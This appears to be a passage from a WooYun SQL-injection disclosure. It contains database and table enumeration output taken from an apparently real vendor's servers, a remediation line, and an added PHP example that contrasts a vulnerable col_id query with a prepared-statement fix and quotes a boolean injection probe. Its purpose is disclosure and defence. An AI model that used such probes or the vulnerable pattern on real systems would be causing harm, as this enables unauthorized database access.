| msg_box_action_7_msg_201109 |
| msg_box_action_8_msg_201109 |
| msg_box_action_9_msg_201109 |
| msg_box_chat_0_msg_201109 |
| msg_box_chat_10_msg_201109 |
| msg_box_chat_11_msg_201109 |
| msg_box_chat_12_msg_201109 |
| msg_box_chat_13_msg_201109 |
| msg_box_chat_14_msg_201109 |
| msg_box_chat_15_msg_201109 |
| msg_box_chat_16_msg_201109 |
| msg_box_chat_17_msg_201109 |
| msg_box_chat_18_msg_201109 |
| msg_box_chat_19_msg_201109 |
| msg_box_chat_1_msg_201109 |
| msg_box_chat_2_msg_201109 |
| msg_box_chat_3_msg_201109 |
| msg_box_chat_4_msg_201109 |
| msg_box_chat_5_msg_201109 |
| msg_box_chat_6_msg_201109 |
| msg_box_chat_7_msg_201109 |
| msg_box_chat_8_msg_201109 |
| msg_box_chat_9_msg_201109 |
| msg_box_friend_0_msg_201109 |
| msg_box_friend_10_msg_201109 |
| msg_box_friend_11_msg_201109 |
| msg_box_friend_12_msg_201109 |
| msg_box_friend_13_msg_201109 |
| msg_box_friend_14_msg_201109 |
| msg_box_friend_15_msg_201109 |
| msg_box_friend_16_msg_201109 |
| msg_box_friend_17_msg_201109 |
| msg_box_friend_18_msg_201109 |
| msg_box_friend_19_msg_201109 |
| msg_box_friend_1_msg_201109 |
| msg_box_friend_2_msg_201109 |
| msg_box_friend_3_msg_201109 |
| msg_box_friend_4_msg_201109 |
| msg_box_friend_5_msg_201109 |
| msg_box_friend_6_msg_201109 |
| msg_box_friend_7_msg_201109 |
| msg_box_friend_8_msg_201109 |
| msg_box_friend_9_msg_201109 |
| msg_public_chat_0_msg_201109 |
| msg_public_chat_10_msg_201109 |
| msg_public_chat_11_msg_201109 |
| msg_public_chat_12_msg_201109 |
| msg_public_chat_13_msg_201109 |
| msg_public_chat_14_msg_201109 |
| msg_public_chat_15_msg_201109 |
| msg_public_chat_16_msg_201109 |
| msg_public_chat_17_msg_201109 |
| msg_public_chat_18_msg_201109 |
| msg_public_chat_19_msg_201109 |
| msg_public_chat_1_msg_201109 |
| msg_public_chat_2_msg_201109 |
| msg_public_chat_3_msg_201109 |
| msg_public_chat_4_msg_201109 |
| msg_public_chat_5_msg_201109 |
| msg_public_chat_6_msg_201109 |
| msg_public_chat_7_msg_201109 |
| msg_public_chat_8_msg_201109 |
| msg_public_chat_9_msg_201109 |
+---------------------------------------+
Database: datacenter
[1 table]
+---------------------------------------+
| box_chat |
+---------------------------------------+
Database: HeziApp
[15 tables]
+---------------------------------------+
| book_banner |
| book_book |
| book_toys |
| box_doodle |
| box_doodleresource |
| box_ebook |
| box_ebookbox |
| box_ebookgroup |
| box_ebookimages |
| box_ebookrecyclebin |
| box_vote_other |
| box_vote_question |
| box_vote_select |
| box_vote_subject |
| box_vote_users |
+---------------------------------------+
Database: license
[52 tables]
+---------------------------------------+
| license_admin |
| license_apply |
| license_area |
| license_brand |
| license_channel |
| license_checktype |
| license_conf |
| license_contract |
| license_contract_channel |
| license_contract_commison |
| license_contract_copy |
| license_contract_payment |
| license_contract_product |
| license_contract_salereport |
| license_currency |
| license_exchange |
| license_exchange_dialog |
| license_exchange_gallery |
| license_licenser |
| license_licenser_group |
| license_log |
| license_nav |
| license_paytype |
| license_picclass |
| license_picdetail |
| license_picdetail_detail |
| license_picture |
| license_picture_access |
| license_pictype |
| license_prodcheck |
| license_prodcheck_dialog |
| license_prodcheck_gallery |
| license_prodcheck_step |
| license_prodclass |
| license_prodtype |
| license_product |
| license_role |
| license_role_access |
| license_role_group |
| license_role_module |
| license_role_nav |
| license_role_node |
| license_step |
| license_user |
| license_user_field |
| license_user_group |
| license_user_log |
| license_user_role_access |
| license_user_role_group |
| license_user_role_module |
| license_user_role_nav |
| license_user_role_node |
+---------------------------------------+
Database: admin
[32 tables]
+---------------------------------------+
| box_check_boxid |
| box_count |
| box_getitemsum |
| box_itemlock |
| daily_report |
| manage_admin |
| manage_adminlog |
| manage_adminmenu |
| manage_adminmessage |
| manage_babi |
| manage_blogcount |
| manage_config |
| manage_controller |
| manage_crontab |
| manage_group |
| manage_ip |
| manage_ipaddress |
| manage_itemlog |
| manage_loginlog |
| manage_members |
| manage_menu |
| manage_notice |
| manage_registernum |
| manage_serverlist |
| manage_serverlogin |
| manage_sfstype |
| manage_systemlog |
| manage_systemnews |
| manage_table |
| newtb |
| rsync_file |
| rsync_ipaddress |
+---------------------------------------+
Database: HeziBasic
[50 tables]
+---------------------------------------+
| arena_info |
| arena_top_list |
| arena_winner_list |
| box_action_detail_log |
| box_area_weather |
| box_check_point |
| box_check_point_mission_relation |
| box_honour_level |
| box_identity_detail |
| box_identity_info |
| box_market_item_filter |
| box_movie_clip |
| box_mystic_gift |
| box_raiders_check_point |
| box_raiders_mission |
| box_sanguo |
| box_scene |
| box_scene_area |
| box_scene_type |
| ext_shake_info |
| identity_medal_relation |
| identity_reward_list |
| mall_advice |
| mall_goods |
| mall_goods_append |
| mall_goods_item |
| mall_goods_log |
| mall_goods_type |
| mall_log_total |
| medal_info |
| mission_fresh_info |
| mission_info |
| mission_item |
| mission_npc_info |
| mission_relation |
| mission_type |
| mission_xml |
| mystic_gift_answer |
| mystic_gift_question |
| mystic_gift_question_answer_relation |
| mystic_gift_question_relation |
| party_base_config |
| party_info |
| party_scene_relation |
| party_time_config |
| sso_qh_box_relation |
| sso_qq_box_relation |
| system_user_blacklist |
| temp_box_unusual_out_log |
| temp_box_usual_out_log |
+---------------------------------------+
Database: HeziPlant
[209 tables]
+---------------------------------------+
| box_plant_0 |
| box_plant_1 |
| box_plant_10 |
| box_plant_11 |
| box_plant_12 |
| box_plant_13 |
| box_plant_14 |
| box_plant_15 |
| box_plant_16 |
| box_plant_17 |
| box_plant_18 |
| box_plant_19 |
| box_plant_2 |
| box_plant_3 |
| box_plant_4 |
| box_plant_5 |
| box_plant_6 |
| box_plant_7 |
| box_plant_8 |
| box_plant_9 |
| box_plant_farm_0 |
| box_plant_farm_1 |
| box_plant_farm_10 |
| box_plant_farm_11 |
| box_plant_farm_12 |
| box_plant_farm_13 |
| box_plant_farm_14 |
| box_plant_farm_15 |
| box_plant_farm_16 |
| box_plant_farm_17 |
| box_plant_farm_18 |
| box_plant_farm_19 |
| box_plant_farm_2 |
| box_plant_farm_3 |
| box_plant_farm_4 |
| box_plant_farm_5 |
| box_plant_farm_6 |
| box_plant_farm_7 |
| box_plant_farm_8 |
| box_plant_farm_9 |
| box_plant_farmbg_0 |
| box_plant_farmbg_1 |
| box_plant_farmbg_10 |
| box_plant_farmbg_11 |
| box_plant_farmbg_12 |
| box_plant_farmbg_13 |
| box_plant_farmbg_14 |
| box_plant_farmbg_15 |
| box_plant_farmbg_16 |
| box_plant_farmbg_17 |
| box_plant_farmbg_18 |
| box_plant_farmbg_19 |
| box_plant_farmbg_2 |
| box_plant_farmbg_3 |
| box_plant_farmbg_4 |
| box_plant_farmbg_5 |
| box_plant_farmbg_6 |
| box_plant_farmbg_7 |
| box_plant_farmbg_8 |
| box_plant_farmbg_9 |
| box_plant_fruit_0 |
| box_plant_fruit_1 |
| box_plant_fruit_10 |
| box_plant_fruit_11 |
| box_plant_fruit_12 |
| box_plant_fruit_13 |
| box_plant_fruit_14 |
| box_plant_fruit_15 |
| box

Remediation:

Strict filtering.

Copyright notice: when reposting, please credit the source qqdaxingxing@乌云 (WooYun).


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively refused.
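To make that remediation concrete, here is an added PHP example (not the vendor's code and not part of the original report) of how a news_detail.php lookup can take col_id from the request without the value ever reaching the SQL text: validate the type, then bind the value as a query parameter. The table `news` and its columns are assumptions, as the report only lists table names from other schemas; the fixture uses an in-memory SQLite database (pdo_sqlite extension) so it runs offline.

```php
<?php
// Added example (not the vendor's code): the vulnerable splice pattern next to
// a hardened lookup for col_id.  Table `news` and its columns are assumed.

declare(strict_types=1);

// Vulnerable pattern, shown only for contrast: the raw GET value is spliced
// into the query, so "3234 AND 9307=9307" or a UNION probe runs as SQL.
function vulnerableLookup(PDO $db, string $rawColId): array
{
    $sql = 'SELECT id, title FROM news WHERE col_id = ' . $rawColId;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: enforce the parameter's type first (col_id is a numeric
// identifier), then bind it so the driver never interprets it as SQL.
// Returns null when the input is rejected; the caller should answer 400.
function safeLookup(PDO $db, string $rawColId): ?array
{
    $colId = filter_var($rawColId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($colId === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, title FROM news WHERE col_id = :col_id');
    $stmt->bindValue(':col_id', $colId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed fixture so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, col_id INTEGER, title TEXT)');
$db->exec("INSERT INTO news (col_id, title) VALUES (3234, 'public article'), (1, 'other article')");

// A legitimate request returns one row under either function.
printf("legit   vulnerable=%d safe=%d\n",
    count(vulnerableLookup($db, '3234')), count(safeLookup($db, '3234') ?? []));

// The boolean-based probe from the report: the spliced query evaluates the
// tautology and still returns the row (the difference a scanner measures),
// while the hardened lookup refuses the value before any SQL is built.
$probe = '3234 AND 9307=9307';
printf("probe   vulnerable=%d safe=%s\n",
    count(vulnerableLookup($db, $probe)),
    safeLookup($db, $probe) === null ? 'rejected' : 'accepted');
```

The integer check alone defeats every payload listed in the report, since none of them is a bare integer, but the prepared statement is what makes the fix hold for parameters that legitimately carry free text: with a bound parameter the value is sent to the server separately from the statement and cannot change its structure, whatever characters it contains.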